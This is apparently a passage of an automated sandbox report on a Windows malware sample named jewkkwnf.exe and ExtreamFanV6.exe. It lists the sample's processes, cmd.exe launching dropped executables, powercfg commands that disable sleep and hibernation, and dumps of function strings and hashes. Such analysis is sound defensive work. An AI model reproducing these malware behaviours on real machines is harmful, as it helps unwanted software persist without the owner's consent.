Start time:	11:37:37
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	11:37:40
Start date:	04/09/2024
Path:	C:\ProgramData\jewkkwnf\jewkkwnf.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\jewkkwnf\jewkkwnf.exe
Imagebase:	0x5c0000
File size:	8'684'256 bytes
MD5 hash:	B5887A19FE50BFA32B524AAAD0A453BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 67%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:37:40
Start date:	04/09/2024
Path:	C:\ProgramData\jewkkwnf\jewkkwnf.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\jewkkwnf\jewkkwnf.exe
Imagebase:	0xde0000
File size:	8'684'256 bytes
MD5 hash:	B5887A19FE50BFA32B524AAAD0A453BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	11:37:47
Start date:	04/09/2024
Path:	C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Imagebase:	0x800000
File size:	8'684'256 bytes
MD5 hash:	B5887A19FE50BFA32B524AAAD0A453BC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 67%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	11:37:50
Start date:	04/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	11:37:50
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff72f510000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff72f510000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff72f510000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Imagebase:	0xa0000
File size:	8'684'256 bytes
MD5 hash:	B5887A19FE50BFA32B524AAAD0A453BC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff72f510000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	11:37:51
Start date:	04/09/2024
Path:	C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Imagebase:	0xdd0000
File size:	8'684'256 bytes
MD5 hash:	B5887A19FE50BFA32B524AAAD0A453BC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	95
Total number of Limit Nodes:	3

Executed Functions

Function 05917981 Relevance: 84.7, Strings: 67, Instructions: 980
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

T, xrefs: 05917E4A
`, xrefs: 05918716
W, xrefs: 059188BE
B, xrefs: 059188EA
T, xrefs: 0591814E
$, xrefs: 05917BE9
[, xrefs: 05918290
Q, xrefs: 0591880E
<aB, xrefs: 05918496
P, xrefs: 059182A6
1, xrefs: 0591834A
6, xrefs: 0591884C
`, xrefs: 05917C3E
X, xrefs: 059182C4
_, xrefs: 0591841A
^, xrefs: 05918734
,, xrefs: 05917DA2
;, xrefs: 05917EF8
X, xrefs: 05918908
c, xrefs: 05917FDA
%, xrefs: 05917DC8
a, xrefs: 05917FEC
@, xrefs: 05917BDB
*, xrefs: 05918866
O, xrefs: 059186C2
, xrefs: 05917F9C
Z, xrefs: 05918424
2, xrefs: 05918376
;, xrefs: 05917D20
8, xrefs: 059184B6
O, xrefs: 0591853E
:, xrefs: 059186F4
6, xrefs: 059180E6
>, xrefs: 05918114
, xrefs: 05917E40
', xrefs: 059188B2
!, xrefs: 05917C52
], xrefs: 05918482
#, xrefs: 05917B89
Z, xrefs: 05918514
S, xrefs: 05917B5D
@, xrefs: 0591823E
=, xrefs: 05918766
N, xrefs: 059181C8
:, xrefs: 05917F38
3, xrefs: 05917EB0
<, xrefs: 0591822A
_, xrefs: 0591888E
%, xrefs: 0591860A
!, xrefs: 05917E36
T, xrefs: 05917EA6
2, xrefs: 059188D4
?, xrefs: 059180B8
H, xrefs: 05917D2A
1, xrefs: 059184AC
P, xrefs: 05917CB4
J, xrefs: 05917B7D
Z, xrefs: 05918024
I, xrefs: 059183C4
T, xrefs: 059180FA
>, xrefs: 0591811E
A, xrefs: 05917F0E
M, xrefs: 0591875A
[, xrefs: 05917E84
L, xrefs: 05917C48
(fB, xrefs: 0591879E
V, xrefs: 05917B49

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $ $!$!$#$$$%$%$'$(fB$*$,$1$1$2$2$3$6$6$8$:$:$;$;$<$=$>$>$?$@$@$A$B$H$I$J$L$M$N$O$O$P$P$Q$S$T$T$T$T$V$W$X$X$Z$Z$Z$[$[$]$^$_$_$`$`$a$c$<aB
API String ID: 0-999022309
Opcode ID: a34934374a778c21f78fedf7efec8a31441bd24e5c3da1c3ea82f6584ddb8457
Instruction ID: 9dd73e632302673a12a6972d8f550fccca3784d4e46f1690351d81025daff653
Opcode Fuzzy Hash: a34934374a778c21f78fedf7efec8a31441bd24e5c3da1c3ea82f6584ddb8457
Instruction Fuzzy Hash: 11B2A4B4E01629CFEB64CF2ADD8479ABBB5FB89301F0091EAD40CA7250D7795E858F14

Function 05917990 Relevance: 84.7, Strings: 67, Instructions: 977
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

T, xrefs: 05917E4A
`, xrefs: 05918716
W, xrefs: 059188BE
B, xrefs: 059188EA
T, xrefs: 0591814E
$, xrefs: 05917BE9
[, xrefs: 05918290
Q, xrefs: 0591880E
<aB, xrefs: 05918496
P, xrefs: 059182A6
1, xrefs: 0591834A
6, xrefs: 0591884C
`, xrefs: 05917C3E
X, xrefs: 059182C4
_, xrefs: 0591841A
^, xrefs: 05918734
,, xrefs: 05917DA2
;, xrefs: 05917EF8
X, xrefs: 05918908
c, xrefs: 05917FDA
%, xrefs: 05917DC8
a, xrefs: 05917FEC
@, xrefs: 05917BDB
*, xrefs: 05918866
O, xrefs: 059186C2
, xrefs: 05917F9C
Z, xrefs: 05918424
2, xrefs: 05918376
;, xrefs: 05917D20
8, xrefs: 059184B6
O, xrefs: 0591853E
:, xrefs: 059186F4
6, xrefs: 059180E6
>, xrefs: 05918114
, xrefs: 05917E40
', xrefs: 059188B2
!, xrefs: 05917C52
], xrefs: 05918482
#, xrefs: 05917B89
Z, xrefs: 05918514
S, xrefs: 05917B5D
@, xrefs: 0591823E
=, xrefs: 05918766
N, xrefs: 059181C8
:, xrefs: 05917F38
3, xrefs: 05917EB0
<, xrefs: 0591822A
_, xrefs: 0591888E
%, xrefs: 0591860A
!, xrefs: 05917E36
T, xrefs: 05917EA6
2, xrefs: 059188D4
?, xrefs: 059180B8
H, xrefs: 05917D2A
1, xrefs: 059184AC
P, xrefs: 05917CB4
J, xrefs: 05917B7D
Z, xrefs: 05918024
I, xrefs: 059183C4
T, xrefs: 059180FA
>, xrefs: 0591811E
A, xrefs: 05917F0E
M, xrefs: 0591875A
[, xrefs: 05917E84
L, xrefs: 05917C48
(fB, xrefs: 0591879E
V, xrefs: 05917B49

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $ $!$!$#$$$%$%$'$(fB$*$,$1$1$2$2$3$6$6$8$:$:$;$;$<$=$>$>$?$@$@$A$B$H$I$J$L$M$N$O$O$P$P$Q$S$T$T$T$T$V$W$X$X$Z$Z$Z$[$[$]$^$_$_$`$`$a$c$<aB
API String ID: 0-999022309
Opcode ID: 79f0330b2d72ee1889792094590c48c44ff5ddf30e2f76bb1584191833a06e76
Instruction ID: aacdffd93a5361a69590a5b5236baea5045d4883758fbf87b60cc99a3e9feb3b
Opcode Fuzzy Hash: 79f0330b2d72ee1889792094590c48c44ff5ddf30e2f76bb1584191833a06e76
Instruction Fuzzy Hash: A0B2A4B4E01629CFEB64CF2ADD4479ABBB5FB89301F0091EAD40CA7250D7795E858F14

Function 05912ACB Relevance: 84.7, Strings: 67, Instructions: 937
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6, xrefs: 05913291
S, xrefs: 05912CFC
,, xrefs: 05912F4D
Z, xrefs: 059131CF
V, xrefs: 05912CE8
X, xrefs: 0591346F
Z, xrefs: 059135CF
Q, xrefs: 059139B9
L, xrefs: 05912DF3
#, xrefs: 05912D28
[, xrefs: 0591302F
A, xrefs: 059130B9
=, xrefs: 05913911
:, xrefs: 059130E3
$, xrefs: 05912D91
(fB, xrefs: 05913949
6, xrefs: 059139F7
O, xrefs: 059136E9
%, xrefs: 059137B5
c, xrefs: 05913185
<, xrefs: 059133D5
a, xrefs: 05913197
;, xrefs: 05912ECB
M, xrefs: 05913905
T, xrefs: 059132A5
P, xrefs: 05912E5F
!, xrefs: 05912FE1
2, xrefs: 05913A7F
_, xrefs: 059135C5
H, xrefs: 05912ED5
!, xrefs: 05912DFD
3, xrefs: 0591305B
1, xrefs: 05913657
:, xrefs: 0591389F
[, xrefs: 0591343B
', xrefs: 05913A5D
^, xrefs: 059138DF
T, xrefs: 05912FF5
, xrefs: 05912FEB
O, xrefs: 0591386D
@, xrefs: 059133E9
8, xrefs: 05913661
, xrefs: 05913147
@, xrefs: 05912D7D
>, xrefs: 059132C9
>, xrefs: 059132BF
;, xrefs: 059130A3
I, xrefs: 0591356F
W, xrefs: 05913A69
B, xrefs: 05913A95
N, xrefs: 05913373
?, xrefs: 05913263
J, xrefs: 05912D1C
`, xrefs: 05912DE9
X, xrefs: 05913AB3
T, xrefs: 059132F9
Z, xrefs: 059136BF
`, xrefs: 059138C1
2, xrefs: 05913521
_, xrefs: 05913A39
P, xrefs: 05913451
T, xrefs: 05913051
<aB, xrefs: 05913641
*, xrefs: 05913A11
], xrefs: 0591362D
%, xrefs: 05912F73
1, xrefs: 059134F5

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $ $!$!$#$$$%$%$'$(fB$*$,$1$1$2$2$3$6$6$8$:$:$;$;$<$=$>$>$?$@$@$A$B$H$I$J$L$M$N$O$O$P$P$Q$S$T$T$T$T$V$W$X$X$Z$Z$Z$[$[$]$^$_$_$`$`$a$c$<aB
API String ID: 0-999022309
Opcode ID: ec02677a4506e757d3546fb84df3c6e51ccd67735a69b5a1224a03e62147cda1
Instruction ID: 1685a5f26a7ad5e73fafd0c17075b7bc5210c3d4605eb8ab4966432b00617a57
Opcode Fuzzy Hash: ec02677a4506e757d3546fb84df3c6e51ccd67735a69b5a1224a03e62147cda1
Instruction Fuzzy Hash: BEA2A5B4E016299FEB64CF2ADD4479ABBF6FB89301F00E1E9950CA7250D7794AC58F04

Function 05912AD0 Relevance: 84.7, Strings: 67, Instructions: 936
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6, xrefs: 05913291
S, xrefs: 05912CFC
,, xrefs: 05912F4D
Z, xrefs: 059131CF
V, xrefs: 05912CE8
X, xrefs: 0591346F
Z, xrefs: 059135CF
Q, xrefs: 059139B9
L, xrefs: 05912DF3
#, xrefs: 05912D28
[, xrefs: 0591302F
A, xrefs: 059130B9
=, xrefs: 05913911
:, xrefs: 059130E3
$, xrefs: 05912D91
(fB, xrefs: 05913949
6, xrefs: 059139F7
O, xrefs: 059136E9
%, xrefs: 059137B5
c, xrefs: 05913185
<, xrefs: 059133D5
a, xrefs: 05913197
;, xrefs: 05912ECB
M, xrefs: 05913905
T, xrefs: 059132A5
P, xrefs: 05912E5F
!, xrefs: 05912FE1
2, xrefs: 05913A7F
_, xrefs: 059135C5
H, xrefs: 05912ED5
!, xrefs: 05912DFD
3, xrefs: 0591305B
1, xrefs: 05913657
:, xrefs: 0591389F
[, xrefs: 0591343B
', xrefs: 05913A5D
^, xrefs: 059138DF
T, xrefs: 05912FF5
, xrefs: 05912FEB
O, xrefs: 0591386D
@, xrefs: 059133E9
8, xrefs: 05913661
, xrefs: 05913147
@, xrefs: 05912D7D
>, xrefs: 059132C9
>, xrefs: 059132BF
;, xrefs: 059130A3
I, xrefs: 0591356F
W, xrefs: 05913A69
B, xrefs: 05913A95
N, xrefs: 05913373
?, xrefs: 05913263
J, xrefs: 05912D1C
`, xrefs: 05912DE9
X, xrefs: 05913AB3
T, xrefs: 059132F9
Z, xrefs: 059136BF
`, xrefs: 059138C1
2, xrefs: 05913521
_, xrefs: 05913A39
P, xrefs: 05913451
T, xrefs: 05913051
<aB, xrefs: 05913641
*, xrefs: 05913A11
], xrefs: 0591362D
%, xrefs: 05912F73
1, xrefs: 059134F5

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $ $!$!$#$$$%$%$'$(fB$*$,$1$1$2$2$3$6$6$8$:$:$;$;$<$=$>$>$?$@$@$A$B$H$I$J$L$M$N$O$O$P$P$Q$S$T$T$T$T$V$W$X$X$Z$Z$Z$[$[$]$^$_$_$`$`$a$c$<aB
API String ID: 0-999022309
Opcode ID: c2b58eb0dd6d55c787db02a4413e3f140fe5b0490ec4102ceb6f09dd82660f1b
Instruction ID: ee7881a49c215903ce0462dd97956c1773743ffac78b1238598710d4ad2e37fa
Opcode Fuzzy Hash: c2b58eb0dd6d55c787db02a4413e3f140fe5b0490ec4102ceb6f09dd82660f1b
Instruction Fuzzy Hash: 37A2A5B4E016299FEB64CF2ADD4479ABBF6FB89301F00E1E9950CA7250D7794AC58F04

Function 05913DA8 Relevance: 84.7, Strings: 67, Instructions: 913
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 059145DC
8, xrefs: 0591497E
3, xrefs: 05914378
T, xrefs: 0591436E
;, xrefs: 059143C0
^, xrefs: 05914BFC
Z, xrefs: 059149DC
6, xrefs: 05914D14
`, xrefs: 05914BDE
a, xrefs: 059144B4
W, xrefs: 05914D86
O, xrefs: 05914B8A
, xrefs: 05914464
@, xrefs: 05914706
X, xrefs: 05914DD0
_, xrefs: 059148E2
H, xrefs: 059141F2
1, xrefs: 05914812
!, xrefs: 059142FE
:, xrefs: 05914BBC
2, xrefs: 0591483E
I, xrefs: 0591488C
1, xrefs: 05914974
c, xrefs: 059144A2
Z, xrefs: 059148EC
,, xrefs: 0591426A
N, xrefs: 05914690
2, xrefs: 05914D9C
*, xrefs: 05914D2E
6, xrefs: 059145AE
P, xrefs: 0591417C
', xrefs: 05914D7A
[, xrefs: 05914758
>, xrefs: 059145E6
?, xrefs: 05914580
M, xrefs: 05914C22
], xrefs: 0591494A
O, xrefs: 05914A06
T, xrefs: 059145C2
J, xrefs: 05914039
V, xrefs: 05914005
Q, xrefs: 05914CD6
X, xrefs: 0591478C
<aB, xrefs: 0591495E
T, xrefs: 05914312
Z, xrefs: 059144EC
, xrefs: 05914308
L, xrefs: 05914110
%, xrefs: 05914AD2
B, xrefs: 05914DB2
:, xrefs: 05914400
#, xrefs: 05914045
%, xrefs: 05914290
$, xrefs: 059140AE
<, xrefs: 059146F2
P, xrefs: 0591476E
[, xrefs: 0591434C
S, xrefs: 05914019
=, xrefs: 05914C2E
A, xrefs: 059143D6
!, xrefs: 0591411A
@, xrefs: 0591409A
T, xrefs: 05914616
(fB, xrefs: 05914C66
`, xrefs: 05914106
_, xrefs: 05914D56
;, xrefs: 059141E8

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $ $!$!$#$$$%$%$'$(fB$*$,$1$1$2$2$3$6$6$8$:$:$;$;$<$=$>$>$?$@$@$A$B$H$I$J$L$M$N$O$O$P$P$Q$S$T$T$T$T$V$W$X$X$Z$Z$Z$[$[$]$^$_$_$`$`$a$c$<aB
API String ID: 0-999022309
Opcode ID: 8e632852bea439efc6796c3d55b559b183248b21d0c202a9ea07f67cd16cee61
Instruction ID: 944d13d9c71ce9774115f02a90eb470d20971f761a304aeefc95b3e726975e24
Opcode Fuzzy Hash: 8e632852bea439efc6796c3d55b559b183248b21d0c202a9ea07f67cd16cee61
Instruction Fuzzy Hash: 78A2A4B1E016298BEB64CF2ADD4479ABBF6FB89301F0491E9D50CA7250D7794AC5CF08

Function 05913DB8 Relevance: 84.6, Strings: 67, Instructions: 896
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 059145DC
8, xrefs: 0591497E
3, xrefs: 05914378
T, xrefs: 0591436E
;, xrefs: 059143C0
^, xrefs: 05914BFC
Z, xrefs: 059149DC
6, xrefs: 05914D14
`, xrefs: 05914BDE
a, xrefs: 059144B4
W, xrefs: 05914D86
O, xrefs: 05914B8A
, xrefs: 05914464
@, xrefs: 05914706
X, xrefs: 05914DD0
_, xrefs: 059148E2
H, xrefs: 059141F2
1, xrefs: 05914812
!, xrefs: 059142FE
:, xrefs: 05914BBC
2, xrefs: 0591483E
I, xrefs: 0591488C
1, xrefs: 05914974
c, xrefs: 059144A2
Z, xrefs: 059148EC
,, xrefs: 0591426A
N, xrefs: 05914690
2, xrefs: 05914D9C
*, xrefs: 05914D2E
6, xrefs: 059145AE
P, xrefs: 0591417C
', xrefs: 05914D7A
[, xrefs: 05914758
>, xrefs: 059145E6
?, xrefs: 05914580
M, xrefs: 05914C22
], xrefs: 0591494A
O, xrefs: 05914A06
T, xrefs: 059145C2
J, xrefs: 05914039
V, xrefs: 05914005
Q, xrefs: 05914CD6
X, xrefs: 0591478C
<aB, xrefs: 0591495E
T, xrefs: 05914312
Z, xrefs: 059144EC
, xrefs: 05914308
L, xrefs: 05914110
%, xrefs: 05914AD2
B, xrefs: 05914DB2
:, xrefs: 05914400
#, xrefs: 05914045
%, xrefs: 05914290
$, xrefs: 059140AE
<, xrefs: 059146F2
P, xrefs: 0591476E
[, xrefs: 0591434C
S, xrefs: 05914019
=, xrefs: 05914C2E
A, xrefs: 059143D6
!, xrefs: 0591411A
@, xrefs: 0591409A
T, xrefs: 05914616
(fB, xrefs: 05914C66
`, xrefs: 05914106
_, xrefs: 05914D56
;, xrefs: 059141E8

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $ $!$!$#$$$%$%$'$(fB$*$,$1$1$2$2$3$6$6$8$:$:$;$;$<$=$>$>$?$@$@$A$B$H$I$J$L$M$N$O$O$P$P$Q$S$T$T$T$T$V$W$X$X$Z$Z$Z$[$[$]$^$_$_$`$`$a$c$<aB
API String ID: 0-999022309
Opcode ID: cfc5d28223743c184bc899e796b4f61057a05b26b702204fb619ed655cd110d0
Instruction ID: 4e42962f36ea5f759d75814b04b2769e8bc3847c1429d523b9bee3298088bc7b
Opcode Fuzzy Hash: cfc5d28223743c184bc899e796b4f61057a05b26b702204fb619ed655cd110d0
Instruction Fuzzy Hash: B7A2A5B1E016298BEB64CF2ADD4479ABBF6FB89301F0491E9D50CA7250D7794AC5CF08

Function 05910006 Relevance: 77.2, Strings: 61, Instructions: 987
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 05910537
I, xrefs: 0591052D
C, xrefs: 059107B7
P, xrefs: 05910CC7
M, xrefs: 05910185
!, xrefs: 05910777
A, xrefs: 05910226
YQ3B, xrefs: 0591093F
E, xrefs: 05910BDD
a, xrefs: 059108BB
P, xrefs: 05910EEB
K, xrefs: 059103EB
', xrefs: 05910D01
-, xrefs: 059105B9
W, xrefs: 05910843
8, xrefs: 0591084D
D, xrefs: 05910FB7
>, xrefs: 05910863
S, xrefs: 0591023A
Q, xrefs: 05910B9F
[, xrefs: 059104D9
B, xrefs: 059102AD
G, xrefs: 0591064F
W, xrefs: 05910D41
P, xrefs: 05910EC7
:, xrefs: 05910DF3
/kB, xrefs: 05910BD3
&, xrefs: 059106F1
$, xrefs: 05910575
l?g@, xrefs: 05910DC1
), xrefs: 05910D4D
, xrefs: 05910CBB
-, xrefs: 0591069B
T, xrefs: 059106D1
-, xrefs: 05910401
(, xrefs: 05910B8B
a, xrefs: 05910BBF
., xrefs: 05911029
_, xrefs: 0591090B
B, xrefs: 05910359
D, xrefs: 05910B33
9A>B, xrefs: 05910F6B
8, xrefs: 0591070B
T, xrefs: 059102E7
IyB, xrefs: 05910DCD
4, xrefs: 05910755
V, xrefs: 0591060F
., xrefs: 0591100F
2\@, xrefs: 05910C8B
8, xrefs: 059101F4
E, xrefs: 059103A9
', xrefs: 059101CD
[7sB, xrefs: 05910DFF
4, xrefs: 05910EAF
?, xrefs: 059102B7
., xrefs: 05910F21
D, xrefs: 05910A69
=, xrefs: 059102F1
Y, xrefs: 05910A5F
@dgB, xrefs: 059103C3
H, xrefs: 05910CAF

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $!$$$&$'$'$($)$-$-$-$.$.$.$/kB$4$4$8$8$8$8$9A>B$:$=$>$?$@dgB$A$B$B$C$D$D$D$E$E$G$H$I$IyB$K$M$P$P$P$Q$S$T$T$V$W$W$Y$YQ3B$[$[7sB$_$a$a$l?g@$2\@
API String ID: 0-1098073836
Opcode ID: 128ba95472bdae323a1d1636e1b7d4f5893e4b5bc68e6d3cba258d853cdd5100
Instruction ID: 759ce2ae013d53ca7362d9338df81e81475cec526b19d5a3a1d7ce689131265b
Opcode Fuzzy Hash: 128ba95472bdae323a1d1636e1b7d4f5893e4b5bc68e6d3cba258d853cdd5100
Instruction Fuzzy Hash: 3FB2A0B4E05A69CFDB64CF29DE4479ABBB5FB49301F00A1EA940CA7250D77A5E84CF04

Function 05910040 Relevance: 77.2, Strings: 61, Instructions: 972
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 05910537
I, xrefs: 0591052D
C, xrefs: 059107B7
P, xrefs: 05910CC7
M, xrefs: 05910185
!, xrefs: 05910777
A, xrefs: 05910226
YQ3B, xrefs: 0591093F
E, xrefs: 05910BDD
a, xrefs: 059108BB
P, xrefs: 05910EEB
K, xrefs: 059103EB
', xrefs: 05910D01
-, xrefs: 059105B9
W, xrefs: 05910843
8, xrefs: 0591084D
D, xrefs: 05910FB7
>, xrefs: 05910863
S, xrefs: 0591023A
Q, xrefs: 05910B9F
[, xrefs: 059104D9
B, xrefs: 059102AD
G, xrefs: 0591064F
W, xrefs: 05910D41
P, xrefs: 05910EC7
:, xrefs: 05910DF3
/kB, xrefs: 05910BD3
&, xrefs: 059106F1
$, xrefs: 05910575
l?g@, xrefs: 05910DC1
), xrefs: 05910D4D
, xrefs: 05910CBB
-, xrefs: 0591069B
T, xrefs: 059106D1
-, xrefs: 05910401
(, xrefs: 05910B8B
a, xrefs: 05910BBF
., xrefs: 05911029
_, xrefs: 0591090B
B, xrefs: 05910359
D, xrefs: 05910B33
9A>B, xrefs: 05910F6B
8, xrefs: 0591070B
T, xrefs: 059102E7
IyB, xrefs: 05910DCD
4, xrefs: 05910755
V, xrefs: 0591060F
., xrefs: 0591100F
2\@, xrefs: 05910C8B
8, xrefs: 059101F4
E, xrefs: 059103A9
', xrefs: 059101CD
[7sB, xrefs: 05910DFF
4, xrefs: 05910EAF
?, xrefs: 059102B7
., xrefs: 05910F21
D, xrefs: 05910A69
=, xrefs: 059102F1
Y, xrefs: 05910A5F
@dgB, xrefs: 059103C3
